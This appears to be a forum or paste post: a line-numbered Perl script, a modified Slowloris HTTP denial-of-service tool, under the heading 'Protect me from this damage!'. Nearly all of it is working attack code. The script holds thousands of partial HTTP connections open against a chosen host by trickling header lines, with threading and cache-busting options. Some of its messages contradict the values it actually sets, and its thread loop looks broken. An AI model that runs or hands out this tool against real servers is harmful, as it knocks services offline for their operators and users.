Protect me from this damage!

1. #!/usr/bin/perl -w
2. use strict;
3. use IO::Socket::INET;
4. use IO::Socket::SSL;
5. use Getopt::Long;
6. use Config;
7.  
8. $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
9.  
10. my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
11. my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
12. my $result = GetOptions(
13. 'shost=s' => \$shost,
14. 'dns=s' => \$host,
15. 'httpready' => \$httpready,
16. 'num=i' => \$connections,
17. 'cache' => \$cache,
18. 'port=i' => \$port,
19. 'https' => \$ssl,
20. 'tcpto=i' => \$tcpto,
21. 'test' => \$test,
22. 'timeout=i' => \$timeout,
23. 'version' => \$version,
24. );
25.  
26. if ($version) {
27. print "Version 0.7\n";
28. exit;
29. }
30.  
31. unless ($host) {
32. print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
33. print "\n\tType 'perldoc $0' for help with options.\n\n";
34. exit;
35. }
36.  
37. unless ($port) {
38. $port = 80;
39. print "Defaulting to port 80.\n";
40. }
41.  
42. unless ($tcpto) {
43. $tcpto = 5;
44. print "Defaulting to a 5 second tcp connection timeout.\n";
45. }
46.  
47. unless ($test) {
48. unless ($timeout) {
49. $timeout = 3;
50. print "Defaulting to a 100 second re-try timeout.\n";
51. }
52. unless ($connections) {
53. $connections = 2500;
54. print "Defaulting to 1000 connections.\n";
55. }
56. }
57.  
58. my $usemultithreading = 0;
59. if ( $Config{usethreads} ) {
60. print "Multithreading enabled.\n";
61. $usemultithreading = 1;
62. use threads;
63. use threads::shared;
64. }
65. else {
66. print "No multithreading capabilites found!\n";
67. print "Slowloris will be slower than normal as a result.\n";
68. }
69.  
70. my $packetcount : shared = 0;
71. my $failed : shared = 0;
72. my $connectioncount : shared = 0;
73.  
74. srand() if ($cache);
75.  
76. if ($shost) {
77. $sendhost = $shost;
78. }
79. else {
80. $sendhost = $host;
81. }
82. if ($httpready) {
83. $method = "POST";
84. }
85. else {
86. $method = "GET";
87. }
88.  
89. if ($test) {
90. my @times = ( "2", "30", "90", "240", "500" );
91. my $totaltime = 0;
92. foreach (@times) {
93. $totaltime = $totaltime + $_;
94. }
95. $totaltime = $totaltime / 60;
96. print "This test could take up to $totaltime minutes.\n";
97.  
98. my $delay = 0;
99. my $working = 0;
100. my $sock;
101.  
102. if ($ssl) {
103. if (
104. $sock = new IO::Socket::SSL(
105. PeerAddr => "$host",
106. PeerPort => "$port",
107. Timeout => "$tcpto",
108. Proto => "tcp",
109. )
110. )
111. {
112. $working = 1;
113. }
114. }
115. else {
116. if (
117. $sock = new IO::Socket::INET(
118. PeerAddr => "$host",
119. PeerPort => "$port",
120. Timeout => "$tcpto",
121. Proto => "tcp",
122. )
123. )
124. {
125. $working = 1;
126. }
127. }
128. if ($working) {
129. if ($cache) {
130. $rand = "?" . int( rand(99999999999999) );
131. }
132. else {
133. $rand = "";
134. }
135. my $primarypayload =
136. "GET /$rand HTTP/1.1\r\n"
137. . "Host: $sendhost\r\n"
138. . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
139. . "Content-Length: 42\r\n";
140. if ( print $sock $primarypayload ) {
141. print "Connection successful, now comes the waiting game...\n";
142. }
143. else {
144. print
145. "That's odd - I connected but couldn't send the data to $host:$port.\n";
146. print "Is something wrong?\nDying.\n";
147. exit;
148. }
149. }
150. else {
151. print "Uhm... I can't connect to $host:$port.\n";
152. print "Is something wrong?\nDying.\n";
153. exit;
154. }
155. for ( my $i = 0 ; $i <= $#times ; $i++ ) {
156. print "Trying a $times[$i] second delay: \n";
157. sleep( $times[$i] );
158. if ( print $sock "X-a: b\r\n" ) {
159. print "\tWorked.\n";
160. $delay = $times[$i];
161. }
162. else {
163. if ( $SIG{__WARN__} ) {
164. $delay = $times[ $i - 1 ];
165. last;
166. }
167. print "\tFailed after $times[$i] seconds.\n";
168. }
169. }
170.  
171. if ( print $sock "Connection: Close\r\n\r\n" ) {
172. print "Okay that's enough time. Slowloris closed the socket.\n";
173. print "Use $delay seconds for -timeout.\n";
174. exit;
175. }
176. else {
177. print "Remote server closed socket.\n";
178. print "Use $delay seconds for -timeout.\n";
179. exit;
180. }
181. if ( $delay < 166 ) {
182. print <<EOSUCKS2BU;
183. Since the timeout ended up being so small ($delay seconds) and it generally
184. takes between 200-500 threads for most servers and assuming any latency at
185. all... you might have trouble using Slowloris against this target. You can
186. tweak the -timeout flag down to less than 10 seconds but it still may not
187. build the sockets in time.
188. EOSUCKS2BU
189. }
190. }
191. else {
192. print
193. "Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
194.  
195. if ($usemultithreading) {
196. domultithreading($connections);
197. }
198. else {
199. doconnections( $connections, $usemultithreading );
200. }
201. }
202.  
203. sub doconnections {
204. my ( $num, $usemultithreading ) = @_;
205. my ( @first, @sock, @working );
206. my $failedconnections = 0;
207. $working[$_] = 0 foreach ( 1 .. $num ); #initializing
208. $first[$_] = 0 foreach ( 1 .. $num ); #initializing
209. while (1) {
210. $failedconnections = 0;
211. print "\t\tBuilding sockets.\n";
212. foreach my $z ( 1 .. $num ) {
213. if ( $working[$z] == 0 ) {
214. if ($ssl) {
215. if (
216. $sock[$z] = new IO::Socket::SSL(
217. PeerAddr => "$host",
218. PeerPort => "$port",
219. Timeout => "$tcpto",
220. Proto => "tcp",
221. )
222. )
223. {
224. $working[$z] = 1;
225. }
226. else {
227. $working[$z] = 0;
228. }
229. }
230. else {
231. if (
232. $sock[$z] = new IO::Socket::INET(
233. PeerAddr => "$host",
234. PeerPort => "$port",
235. Timeout => "$tcpto",
236. Proto => "tcp",
237. )
238. )
239. {
240. $working[$z] = 1;
241. $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
242. }
243. else {
244. $working[$z] = 0;
245. }
246. }
247. if ( $working[$z] == 1 ) {
248. if ($cache) {
249. $rand = "?" . int( rand(99999999999999) );
250. }
251. else {
252. $rand = "";
253. }
254. my $primarypayload =
255. "$method /$rand HTTP/1.1\r\n"
256. . "Host: $sendhost\r\n"
257. . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
258. . "Content-Length: 42\r\n";
259. my $handle = $sock[$z];
260. if ($handle) {
261. print $handle "$primarypayload";
262. if ( $SIG{__WARN__} ) {
263. $working[$z] = 0;
264. close $handle;
265. $failed++;
266. $failedconnections++;
267. }
268. else {
269. $packetcount++;
270. $working[$z] = 1;
271. }
272. }
273. else {
274. $working[$z] = 0;
275. $failed++;
276. $failedconnections++;
277. }
278. }
279. else {
280. $working[$z] = 0;
281. $failed++;
282. $failedconnections++;
283. }
284. }
285. }
286. print "\t\tSending data.\n";
287. foreach my $z ( 1 .. $num ) {
288. if ( $working[$z] == 1 ) {
289. if ( $sock[$z] ) {
290. my $handle = $sock[$z];
291. if ( print $handle "X-a: b\r\n" ) {
292. $working[$z] = 1;
293. $packetcount++;
294. }
295. else {
296. $working[$z] = 0;
297. #debugging info
298. $failed++;
299. $failedconnections++;
300. }
301. }
302. else {
303. $working[$z] = 0;
304. #debugging info
305. $failed++;
306. $failedconnections++;
307. }
308. }
309. }
310. print
311. "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
312. sleep($timeout);
313. }
314. }
315.  
316. sub domultithreading {
317. my ($num) = @_;
318. my @thrs;
319. my $i = 0;
320. my $connectionsperthread = 50;
321. while ( $i < $num ) {
322. $thrs[$i] =
323. threads->create( \&doconnections, $connectionsperthread, 1 );
324. $i += $connectionsperthread;
325. }
326. my @threadslist = threads->list();
327. while ( $#threadslist > 0 ) {
328. $failed = 0;
329. }
330. }